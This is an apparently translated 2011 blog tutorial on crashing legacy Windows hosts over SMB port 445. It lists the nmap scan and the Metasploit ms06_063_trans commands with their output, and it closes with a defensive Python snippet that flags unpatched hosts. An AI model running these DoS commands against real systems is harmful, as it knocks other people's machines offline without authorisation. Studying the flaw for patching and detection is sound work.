Thursday, 03 November 2011

DoS on Windows using Metasploit

It started with browsing around YouTube, and, well.. I came across a video tutorial on how to DoS (denial of service) Windows using Metasploit. I had actually wanted to try it for a long time, but there was a small obstacle: I didn't know where to find a target, and obviously it must not harm anyone else. Getting more curious by the day, I just borrowed my partner's laptop as the test subject, and the result: works 100%.



Here is the list of Windows versions this can be run against :D
Microsoft Windows XP Tablet PC Edition SP2  
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 SP4 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

Here I am using BackTrack Linux; Metasploit and Nmap are installed in it by default. If you use another OS, please install Metasploit and Nmap first. OK, I'll assume you have installed Metasploit and Nmap.

We perform the DoS through port 445. Say the target has the class C IP address 192.168.1.4; we then scan it using nmap.
dede@backtrack:~# nmap -O 192.168.1.4
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-07 21:02 CIT
Nmap scan report for 192.168.1.4
Host is up (0.00030s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
MAC Address: 08:00:27:BF:EF:CC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.31 seconds
dede@backtrack:~#
OK, port 445 is open and the target is running Windows XP SP2. Open Metasploit; I prefer the CLI version, so type msfconsole in the terminal. If you want the GUI version, type msfgui.

dede@backtrack:/pentest/exploits/framework3# msfconsole
_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
|/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 737 exploits - 378 auxiliary - 85 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13820 updated today (2011.10.06)

msf >
Then type the following commands:
  • use dos/windows/smb/ms06_063_trans  
  • show options

Output like the following appears:

Module options (auxiliary/dos/windows/smb/ms06_063_trans):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                                   The target address
RPORT  445              yes       Set the SMB service port

msf  auxiliary(ms06_063_trans) >

There you can see that RHOST, the target IP, has not been set yet, which is to be expected since we haven't set it. To do so, type the following command:
  • set RHOST 192.168.1.4

Now let's check whether we have set the target IP:
show options
Module options (auxiliary/dos/windows/smb/ms06_063_trans):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  445              yes       Set the SMB service port

msf  auxiliary(ms06_063_trans) >
OK, time to run it against the target; type the following command:
  • exploit

Output like this appears:
msf  auxiliary(ms06_063_trans) > exploit
[*] Connecting to the target system...
[*] Sending bad SMB transaction request 1...
[*] Sending bad SMB transaction request 2...
[*] Sending bad SMB transaction request 3...
[*] Sending bad SMB transaction request 4...
[*] Sending bad SMB transaction request 5...
[*] Auxiliary module execution completed
msf  auxiliary(ms06_063_trans) >
Then check the target computer, lol... Windows goes straight into shock and suddenly bluescreens.

Hope this is useful. My advice: don't use it to harm other people, remember it's a sin lol :P
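
Seen from the defending side, the nmap scan shown above is also how you find machines that still need the MS06-063 fix. The following is an added example, not part of the original post: it parses nmap's normal output and lists hosts that have 445/tcp open and an OS guess in the families from the affected list. The function names and the second sample host are assumptions made up for illustration.

```python
import re

# Constructed sample: the scan from the post plus one made-up Linux host.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.4
Host is up (0.00030s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2

Nmap scan report for 192.168.1.9
Host is up (0.00041s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
445/tcp  filtered microsoft-ds
Running: Linux 2.6.X
OS details: Linux 2.6.32
"""

# OS families taken from the post's affected list (Windows 2000, XP, Server 2003).
AFFECTED = re.compile(r"Windows (2000|XP|Server 2003)", re.I)
PORT_LINE = re.compile(r"^(\d+)/tcp\s+(\S+)")

def parse_hosts(text):
    """Split nmap normal output into per-host dicts of TCP port states and OS guess."""
    hosts = []
    for block in text.split("Nmap scan report for ")[1:]:
        lines = block.splitlines()
        host = {"addr": lines[0].strip(), "ports": {}, "os": ""}
        for line in lines[1:]:
            m = PORT_LINE.match(line)
            if m:
                host["ports"][int(m.group(1))] = m.group(2)
            elif line.startswith(("Running:", "OS details:")):
                host["os"] += " " + line.split(":", 1)[1].strip()
        hosts.append(host)
    return hosts

def needs_attention(text):
    """Hosts with 445/tcp open AND an OS guess in the affected families."""
    return [h["addr"] for h in parse_hosts(text)
            if h["ports"].get(445) == "open" and AFFECTED.search(h["os"])]

if __name__ == "__main__":
    for addr in needs_attention(SAMPLE_NMAP):
        print(f"{addr}: SMB (445/tcp) reachable on a legacy Windows build; "
              "apply MS06-063 or block 445 at the firewall")
```

A host whose port 445 shows as filtered or closed is not reported, since the SMB service is not reachable from the scanner's position.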
